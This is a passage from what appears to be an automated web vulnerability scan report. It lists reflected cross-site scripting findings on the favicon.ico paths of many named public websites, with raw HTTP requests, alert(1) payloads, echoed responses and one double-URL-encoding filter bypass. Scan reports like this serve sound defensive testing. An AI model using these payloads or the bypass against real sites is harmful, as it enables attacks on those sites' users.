This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoee0cd'%3bcb0a88443c6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:01 GMT
Server: Apache
Set-Cookie: session=8bd0d740a1e3f55aa6029029f1babb60/1301751361/05455137116852e2aca9e684d063385b; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:31 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:36:02 GMT
Last-Modified: Sat, 02 Apr 2011 13:36:01 GMT
Set-Cookie: browser=1.210801301751361255; path=/; expires=Tue, 30-Mar-21 13:36:01 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<script type="text/javascript">
$().ready(function() {
next_url = '/favicon.icoee0cd';cb0a88443c6';
ajax_img = 'http://media.rent.com/img/global/ajax-loader-blue.gif';
signin_box_state = 'closed';

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
...[SNIP]...

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f was submitted in the REST URL parameter 1. This input was echoed as f5a25"><a b=c>1df3e30028f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icof5a25%2522%253e%253ca%2520b%253dc%253e1df3e30028f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:35:49 GMT
Server: Apache
Set-Cookie: session=10126565fabf461a6858b2961126cae8/1301751350/be94a764a1841ff093210115435aab78; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Sat, 02-Apr-2011 13:36:20 GMT
Cache-Control: must-revalidate
Expires: Sat, 02 Apr 2011 13:35:51 GMT
Last-Modified: Sat, 02 Apr 2011 13:35:50 GMT
Set-Cookie: browser=1.2046613017513502; path=/; expires=Tue, 30-Mar-21 13:35:50 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20069


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8297
...[SNIP]...
<a id="topbar_signin_link_id" class="topbar_signin_link" href="/account/login/" linkname="GlobalHeader_SignIn_Link" rel="/favicon.icof5a25"><a b=c>1df3e30028f">
...[SNIP]...

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 was submitted in the REST URL parameter 1. This input was echoed as 3eefb<img src=a onerror=alert(1)>8088e5a0514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico3eefb<img%20src%3da%20onerror%3dalert(1)>8088e5a0514 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:41:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
X-Powered-By:
Cache-Control: no-cache
Set-Cookie: _session_id=bdfe329ab8b312ccf2f484a799176e11; domain=reverbnation.com; path=/; HttpOnly
Content-Length: 21673
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerCust15535_http_new=4032917968.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a href="/main/global_search?q=favicon.ico3eefb%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8088e5a0514" rel="nofollow">Search for 'favicon.ico3eefb<img src=a onerror=alert(1)>8088e5a0514'</a>
...[SNIP]...

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 682d8'%3b026f574dde7 was submitted in the REST URL parameter 1. This input was echoed as 682d8';026f574dde7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico682d8'%3b026f574dde7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sat, 02 Apr 2011 13:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.ico682d8';026f574dde7';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 was submitted in the REST URL parameter 1. This input was echoed as 1ca3b<img src=a onerror=alert(1)>4816534cea1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /1ca3b<img%20src%3da%20onerror%3dalert(1)>4816534cea1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:01:14 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301752873832%26live%3DOEzzw%252Eh~XWhkUXWWzxjwVzhxexzYwVqzjWYUkqWwwmXezhmzm; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=048; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2232139994; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2232139994; Path=/; Domain=.shopcompanion.com;
Set-Cookie: SHOPPER_LOCATION=Monterey%2C+CA%2C+93940%2C+36%2E600111%2C+-121%2E894521%2C+30; Path=/; Domain=www.shopcompanion.com;
Content-Length: 107216

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" t
...[SNIP]...
<span class="span tx_bold">> 1ca3b<img src=a onerror=alert(1)>4816534cea1</span>
...[SNIP]...

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c2201<a>26331e04736 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c2201<a>26331e04736 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:23 GMT
Server: Apache
Loader-Time-Used: 0.00018
Set-Cookie: __mmsid=d9c2a77556a5d7bf53b16231f5cfac85; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Fri, 02-Apr-2010 13:33:22 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=66a6612fe3ea8c94b39704425bd47fba; expires=Sat, 02-Apr-2016 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=-1|||3|4ecd93f7c006897fc2035eac37f86a5b|AwA%3D|0y9O1dUtLNRNNjIyMFQ1MjV2TgSRrkZmxsaGqQYm5sZmehkluTkA; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Fri, 02-Apr-2010 13:33:23 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 93179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> c2201<A>26331e04736
...[SNIP]...
<h2>How to Shop Smarter for c2201<a>26331e04736: </h2>
...[SNIP]...

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99137<script>alert(1)</script>cb264ab5f87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico99137<script>alert(1)</script>cb264ab5f87 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soft82.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=d833dc533a466d6bfc13ec777b9775ab; path=/; domain=.soft82.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<BASE href="http://www.soft82.com/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<strong>www.soft82.com/favicon.ico99137<script>alert(1)</script>cb264ab5f87</strong>
...[SNIP]...

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7297a"-alert(1)-"4c63be965d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7297a"-alert(1)-"4c63be965d1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:14:05 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=8v774711o8lea5jaf5624ak142; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "http://www.songmeanings.net/favicon.ico7297a"-alert(1)-"4c63be965d1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427ff"><script>alert(1)</script>13601e9ef95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico427ff"><script>alert(1)</script>13601e9ef95 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songmeanings.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:13:57 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=c3e6n99ocvojajgu9q9r37uep5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
   <ti
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.songmeanings.net/favicon.ico427ff"><script>alert(1)</script>13601e9ef95&c5=&c6=&c15=&cj=1" />
...[SNIP]...

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spike.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78520"><script>alert(1)</script>dd39ddafe43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78520"><script>alert(1)</script>dd39ddafe43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spike.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:31:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:44 GMT; path=/
Vary: User-Agent
Content-Length: 33753


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="
...[SNIP]...
<script src="http://repo.comedycentral.com/feeds/init/spike.com?url=/favicon.ico78520"><script>alert(1)</script>dd39ddafe43&pageType=&cmsPageId=&show=&title=&season=&photoTitle=&spikeTvShow=&channel=" type="text/javascript">
...[SNIP]...

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0247"%3balert(1)//9ef130d939d was submitted in the REST URL parameter 1. This input was echoed as c0247";alert(1)//9ef130d939d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc0247"%3balert(1)//9ef130d939d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:43:02 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script>

COMSCORE.beacon({

c1:2,

c2:"6035764",

c3:"",

c4:"http://www.supercheats.com/favicon.icoc0247";alert(1)//9ef130d939d",

c5:"",

c6:"",

c15:""

});

</script>
...[SNIP]...

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ca5'-alert(1)-'190ef52e03b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe3ca5'-alert(1)-'190ef52e03b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:10 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sun, 01 Apr 2012 14:15:10 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkucms4dupord0ov1fcq4vql54; expires=Sat, 23-Apr-2011 14:15:10 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMDtzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkucms4dupord0ov1fcq4vql54%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:10 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icoe3ca5'-alert(1)-'190ef
...[SNIP]...

var random3 = Math.round( Math.random() * 5000230 );

       var URL = ''
           + '&sid=rkucms4dupord0ov1fcq4vql54'
           + '&uid='
           + '&pid=a-self-no'
           + '&site=tarot'
           + '&pg=/favicon.icoe3ca5'-alert(1)-'190ef52e03b'
           + '&pq='
           + '&rf='
           + '&ftr='
           + '&rq='
           + '&res=' + screen.width + 'x' + screen.height
           + '&col=' + c
           + '&brws=' + escape(navigator.appName)
           + '&brv=' + escape(navigator.appVersio
...[SNIP]...

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2e1a2--><script>alert(1)</script>539e602d394 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e1a2--><script>alert(1)</script>539e602d394 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sun, 01 Apr 2012 14:15:12 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=768ks8blt3b6jg5qpk26lbenk6; expires=Sat, 23-Apr-2011 14:15:12 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcxMztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=768ks8blt3b6jg5qpk26lbenk6%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:13 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.ico2e1a2--><script>alert(1)</script>539e602d394
copyright 1999-2011, Visionary Networks
10.3.1.24
#################################### -->
...[SNIP]...

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6937"><script>alert(1)</script>27a4d5e9b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6937"><script>alert(1)</script>27a4d5e9b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tarot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:06 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:15:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sun, 01 Apr 2012 14:15:07 GMT; path=/; domain=.tarot.com
Set-Cookie: BCKPHPSESSID=rkh1871d7jsqqnuv8sjhgil1f0; expires=Sat, 23-Apr-2011 14:15:07 GMT; path=/
Set-Cookie: userStatObj=Tzo4OiJ1c2VyRGF0YSI6Nzp7czoxMToiY29va2llX25hbWUiO3M6MTE6InVzZXJTdGF0T2JqIjtzOjk6Im1lbWJlcl9pZCI7aTowO3M6MTM6InJlZmVycmVkX2Zyb20iO2E6MDp7fXM6MTA6Imxhc3RfdmlzaXQiO2k6MTMwMTc1MzcwNztzOjk6Im5vX3Zpc2l0cyI7aToxO3M6MTg6Im5vX3NhbXBsZV9yZWFkaW5ncyI7aTowO3M6MTg6Im5vX2V4cGVydF9yZWFkaW5ncyI7aTowO30%253D; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Set-Cookie: luser=rkh1871d7jsqqnuv8sjhgil1f0%3A0%3A%3A%3A; expires=Fri, 01-Jul-2011 14:15:07 GMT; path=/; domain=www.tarot.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 26518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="SHORTCUT ICON" href="/favicon.ico">
<!-- ####################################
/favicon.icob6937"><script>alert(1
...[SNIP]...
<INPUT TYPE="hidden" NAME="returnUrl" VALUE="/favicon.icob6937"><script>alert(1)</script>27a4d5e9b5">
...[SNIP]...

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df34"><script>alert(1)</script>277514e1af2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4df34"><script>alert(1)</script>277514e1af2 HTTP/1.1
